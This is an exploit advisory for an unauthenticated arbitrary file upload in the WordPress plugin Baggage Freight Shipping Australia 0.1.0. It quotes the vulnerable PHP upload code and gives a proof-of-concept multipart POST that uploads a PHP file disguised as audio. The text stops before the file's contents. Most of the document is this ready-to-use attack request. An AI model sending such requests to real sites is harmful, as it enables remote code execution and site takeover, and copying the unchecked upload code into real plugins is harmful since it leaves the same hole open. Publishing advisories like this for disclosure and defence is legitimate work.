Exploit Title : WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload
Exploit Author : The Mechiavellian
Exploit Author Facebook : 
Vendor Homepage || software link : https://wordpress.org/plugins/baggage-freight/
Version : 0.1.0
Unrestricted file upload for unahtorized user in package info upload 

 
>Vulnerable code in upload-package.php:
if($_POST["submit"])
{
    if ($_FILES["file"])
    {
        $uploadpath = "../wp-content/plugins/baggage_shipping/upload/".time()."_".$_FILES["file"]["name"];
 
        move_uploaded_file($_FILES["file"]["tmp_name"],$uploadpath);
 
poc :
 
POST /wp-content/plugins/baggage-freight/upload-package.php HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=---------------------------18311719029180117571501079851
...
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="submit"
 
1
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="file"; filename="file.php"
Content-Type: audio/wav